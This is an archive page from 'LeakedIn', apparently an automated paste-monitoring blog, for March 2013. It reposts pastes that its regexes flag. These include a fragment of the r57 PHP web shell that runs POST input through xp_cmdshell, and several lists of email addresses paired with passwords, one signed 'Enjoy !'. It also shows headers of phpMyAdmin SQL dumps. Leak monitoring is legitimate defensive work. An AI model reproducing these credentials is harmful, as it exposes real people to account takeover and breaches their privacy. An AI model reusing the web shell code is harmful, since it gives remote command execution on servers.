LeakedIn Logo
Stories About Data Leaks and Related Stuff

Archive for March, 2013

Potential leak of data: PHP Remote Code Execution

0 votedvote

Detected 2 occurrence(s) of ‘\s+(system|popen|shellexec|exec).*\$(_GET|_POST|_COOKIE|_REQUEST|HTTP_POST_VARS)’:

  if($db)
   {
   if(@mssql_select_db($_POST['test4_md'],$db))
    {
     @mssql_query("drop table r57_temp_table",$db);
     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
     $res = mssql_query("select * from r57_temp_table",$db);
     while(($row=@mssql_fetch_row($res)))
      {
      echo $row[0]."\r\n";
      }
    @mssql_query("drop table r57_temp_table",$db);
    }
    else echo "[-] E

Source: http://pastebin.com/raw.php?i=c62sRP0R

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

Potential leak of data: Email Addresses List

1 votedvote

Detected 2972 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[:,\|]*.*’:

it	caccamo88
zizou@fmfans.it	zinedine
zoanna@alice.it	celafaremo
zonalibera@tiscali.it	oozio774
zoppi@cli.di.unipi.it	ry842jk
zucchetti@polito.it	seveso1234
zucchini.jasmine@gmail.com	jasmine
zunami027@virgilio.it	pacman
zurgo@virgilio.it	php+sql
zyedm79@yahoo.com	libroteoria

By Sn!p3r_GS & SPartak 

Enjoy !

Detected 2972 occurrence(s) of ‘[\s\|,;']+[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[\s\|,;:']+’:

o.it	caccamo88
zizou@fmfans.it	zinedine
zoanna@alice.it	celafaremo
zonalibera@tiscali.it	oozio774
zoppi@cli.di.unipi.it	ry842jk
zucchetti@polito.it	seveso1234
zucchini.jasmine@gmail.com	jasmine
zunami027@virgilio.it	pacman
zurgo@virgilio.it	php+sql
zyedm79@yahoo.com	libroteoria

By Sn!p3r_GS & SPartak 

Enjoy !

Detected 2972 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[ \t;,:\|]+\S+’:

it	caccamo88
zizou@fmfans.it	zinedine
zoanna@alice.it	celafaremo
zonalibera@tiscali.it	oozio774
zoppi@cli.di.unipi.it	ry842jk
zucchetti@polito.it	seveso1234
zucchini.jasmine@gmail.com	jasmine
zunami027@virgilio.it	pacman
zurgo@virgilio.it	php+sql
zyedm79@yahoo.com	libroteoria

By Sn!p3r_GS & SPartak 

Enjoy !

Source: http://pastebin.com/raw.php?i=ArTj5m7v

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

Potential leak of data: phpMyAdmin SQL Dump

0 votedvote

Detected 1 occurrence(s) of ‘^– phpMyAdmin SQL Dump’:

-- phpMyAdmin SQL Dump
-- version 3.4.10.1deb1
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Mar 31, 2013 at 08:50 PM
-- Server version: 5.5.22
-- PHP Version: 5.3.10-1ubuntu3.4

SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";

--
-- Dat

Source: http://pastie.org/pastes/7202472/download

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

Potential leak of data: Email/Password Dump

0 votedvote

Detected 31 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[ \t;,:\|]+\S+’:

yahoo.com:trixie17:RainHardt666
jinu.sibi@yahoo.com:mankind222:kk y u mad
uncage@live.com:mortal:Titus 15
systemofadownruleforeva@hotmail.com:slayer1:filthymugg
Eugene.Lim.0@gmail.com:2000113:Farmaround
bradenwilhite@yahoo.com:hollister1:Electromars
Tom11li@hotmail.com:jashi1:NeuroExius

Detected 32 occurrence(s) of ‘[\s\|,;']+[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[\s\|,;:']+’:

7@yahoo.com:trixie17:RainHardt666
jinu.sibi@yahoo.com:mankind222:kk y u mad
uncage@live.com:mortal:Titus 15
systemofadownruleforeva@hotmail.com:slayer1:filthymugg
Eugene.Lim.0@gmail.com:2000113:Farmaround
bradenwilhite@yahoo.com:hollister1:Electromars
Tom11li@hotmail.com:jashi1:NeuroExius

Source: http://pastebin.com/raw.php?i=PDjCeUN8

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

Potential leak of data: phpMyAdmin SQL Dump

0 votedvote

Detected 1 occurrence(s) of ‘^– phpMyAdmin SQL Dump’:

-- phpMyAdmin SQL Dump
-- version 3.4.11.1
-- http://www.phpmyadmin.net
--
-- Servidor: localhost
-- Tempo de Geração: 29/10/2012 às 20:52:16
-- Versão do Servidor: 5.1.65
-- Versão do PHP: 5.2.9

SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*

Source: http://pastebin.com/raw.php?i=sYpPhQRW

If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.

You are currently browsing the LeakedIn blog archives for March, 2013.